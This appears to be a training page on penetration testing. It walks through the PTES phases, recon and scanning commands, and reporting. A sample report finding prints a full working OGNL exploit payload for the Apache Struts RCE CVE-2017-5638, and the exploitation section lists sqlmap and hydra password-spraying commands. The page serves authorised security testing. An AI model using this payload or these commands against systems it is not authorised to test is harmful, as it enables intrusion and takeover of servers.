Skip to main content

Skillber v1.0 is here!

Learn more

Penetration Testing

Checking access...

Penetration testing (pen testing) is the authorised, simulated attack on a system to evaluate its security. Unlike vulnerability scanning (automated, broad), pen testing is manual, deep, and focused on demonstrating business impact.

Testing Types

By Knowledge Level

TypeKnowledge GivenSimulatesDepthBest For
Black boxNothing (just a domain name or IP range)External attacker with no inside knowledgeLow-MediumExternal perimeter testing
Grey boxLimited credentials, architecture docsCompromised insider or contractorMedium-HighInternal network, web app testing
White boxFull access: source code, credentials, architecture, configsInternal audit, developer reviewHighestCode review, cryptography review, complex logic

By Target

TargetFocusTypical DurationTypical Cost
External networkPerimeter defences, exposed services1-2 weeks$10k-$30k
Internal networkLateral movement, privilege escalation1-2 weeks$15k-$40k
Web applicationOWASP Top 10, business logic flaws2-4 weeks$20k-$60k
Mobile appAPI security, local storage, reverse engineering1-3 weeks$15k-$50k
CloudIAM misconfigurations, data exposure1-2 weeks$15k-$30k
PhysicalPhysical access controls, tailgating1-5 days$5k-$20k
Social engineeringPhishing, pretexting, vishing1-2 weeks$10k-$20k

Penetration Testing Execution Standard (PTES)

PTES defines seven phases of a penetration test:

Phase 1: Pre-engagement Interactions

Everything before testing begins:

SCOPE AGREEMENT:
- Target IPs/domains: 203.0.113.0/24, *.example.com
- In-scope systems: Production web servers, API endpoints
- Out-of-scope: Database servers, backup systems, SCADA
- Testing window: 9 PM - 5 AM (maintenance window)
- Excluded attacks: DDoS, physical destruction, social engineering of support staff
RULES OF ENGAGEMENT:
- No destructive actions without prior approval
- No exfiltration of real customer data (use synthetic data markers)
- Provide emergency contact numbers (in case of accidental service disruption)
- Third-party notification: will we notify cloud providers? (AWS, Azure)

Phase 2: Intelligence Gathering (Reconnaissance)

Passive and active information gathering:

Terminal window
# Passive reconnaissance
whois example.com
dig any example.com
dig mx example.com
dig ns example.com
# Subdomain enumeration
sublist3r -d example.com
amass enum -d example.com
# Technology fingerprinting
whatweb example.com
wappalyzer https://example.com
# Shodan search
shodan search hostname:example.com
shodan search org:"Example Corp"
# Certificate transparency
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq '.[].name_value'

Phase 3: Threat Modelling

Identify what matters most and what attacks are most likely:

AssetThreatAttack VectorLikelihoodImpact
Customer databaseData theftSQL injection, compromised credentialsMediumCritical
Payment systemFraudAPI abuse, MITMLowCritical
Admin panelFull compromiseWeak authentication, session hijackingMediumCritical
Public websiteDefacementUnpatched CMS, XSSHighLow

Phase 4: Vulnerability Analysis

Automated scanning combined with manual verification:

Terminal window
# Network scanning
nmap -sV -sC -p- -oA nmap_scan 203.0.113.0/24
# Web application scanning (automated + manual)
zap-cli quick-scan --spider -l https://example.com
nikto -h https://example.com
# Manual verification: for each automated finding
# - Confirm false positive / true positive
# - Determine if the finding is exploitable
# - Assess the business impact of exploitation

Phase 5: Exploitation

Attempt to exploit vulnerabilities to demonstrate impact:

Terminal window
# SQL injection demonstration
sqlmap -u "https://example.com/page?id=1" --batch --banner
# Attempt privilege escalation
# Linux: kernel exploits, sudo misconfigurations, SUID binaries
# Windows: unquoted service paths, vulnerable drivers, token manipulation
# Password spraying
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
# Lateral movement
# CrackMapExec, Mimikatz, BloodHound, PowerShell remoting

Phase 6: Post-Exploitation

After gaining access, demonstrate the maximum business impact:

Terminal window
# What can we access from this position?
# Enumerate network shares, databases, cloud consoles
# Can we pivot to more critical systems?
# BloodHound: find privilege escalation paths in Active Directory
# What data can we exfiltrate?
# Locate and access PII, financial data, intellectual property
# Can we achieve persistence?
# Backdoor accounts, SSH keys, scheduled tasks

Phase 7: Reporting

The report is the only deliverable the client receives. A poor report undermines the entire test:

EXECUTIVE SUMMARY (1-2 pages):
- High-level overview for non-technical leadership
- Key findings in business context
- Risk rating and remediation priority
- No technical jargon
TECHNICAL REPORT:
- Finding details with CVSS scores
- Step-by-step reproduction instructions
- Screenshots of each finding
- Proof-of-concept code (if applicable)
- Remediation guidance
APPENDICES:
- Scope and rules of engagement
- Tools used
- Raw scan data
- Excluded findings (false positives, out-of-scope)

Sample Finding

Finding #1: Remote Code Execution via Unpatched Apache Struts (CVE-2017-5638)
Severity: Critical (CVSS 10.0)
Asset: https://example.com (203.0.113.50)
Description:
The Apache Struts framework on the target server is running version
2.3.32 which is vulnerable to CVE-2017-5638. This vulnerability allows
unauthenticated remote code execution through specially crafted
Content-Type headers.
Reproduction:
1. Navigate to https://example.com/login.action
2. Intercept the request with Burp Suite
3. Send the following request:
GET /login.action HTTP/1.1
Host: example.com
Content-Type: %{(#_='multi_part_name').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.
ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.
ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.
getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').
(#cmds=@java.lang.Runtime@getRuntime().exec(#cmd)).(#iswin=@java.lang.System@
getProperty('os.name').toLowerCase().contains('win')).(#cmds=(#iswin?{'cmd.exe','/c',
#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.
redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.
ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.
io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
4. The response contains: uid=0(root) gid=0(root) groups=0(root)
Impact:
Full remote code execution as root on the production web server.
An attacker could install a webshell, pivot to internal networks,
access the customer database, and exfiltrate PII.
Remediation:
Upgrade Apache Struts to version 2.5.12 or later immediately.
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

OWASP Testing Guide

The OWASP Web Security Testing Guide (WSTG) provides a comprehensive framework for web application testing:

ModuleTestsBusiness Risk
Information GatheringSearch engine discovery, fingerprinting, robots.txt reviewExposure of sensitive information
Authentication TestingCredential transport, enumeration, brute force, weak password policyAccount takeover
Session Management TestingCookie attributes, session fixation, CSRFSession hijacking
Authorisation TestingPath traversal, privilege escalation, IDORUnauthorised data access
Input Validation TestingSQL injection, XSS, command injection, file uploadData breach, RCE
Business Logic TestingWorkflow bypass, race conditions, excessive data exposureFinancial fraud

When to Pen Test vs Vulnerability Scan

FactorVulnerability ScanPenetration Test
FrequencyWeekly to monthlyAnnually or per major change
CostLow ($1k-$5k/year)High ($10k-$100k+)
CoverageBroad (all known CVEs)Deep (specific attack paths)
False positivesHigherLower (manual verification)
Business impactShows WHAT is vulnerableShows SO WHAT if exploited
Regulatory requirementPCI DSS, HIPAA (quarterly)PCI DSS (annual), SOC 2

Tip

Run vulnerability scans monthly. Run penetration tests annually. But never run a pen test without first having run a vulnerability scan — you waste the pen tester’s time (and your money) asking them to find CVEs an automated scanner would have found for $50.

Key Takeaways

  • Penetration testing is manual, deep, and focused on demonstrating business impact — it complements but does not replace vulnerability scanning
  • PTES defines seven phases from pre-engagement to reporting — follow a standardised methodology for consistency and defensibility
  • Test types (black, grey, white box) offer different trade-offs between realism and depth — choose based on your specific threat model
  • The report is the only deliverable — invest as much in clear, actionable reporting as in technical exploitation
  • Vulnerability scans are for frequency (monthly); pen tests are for depth (annually) — run both as part of a comprehensive program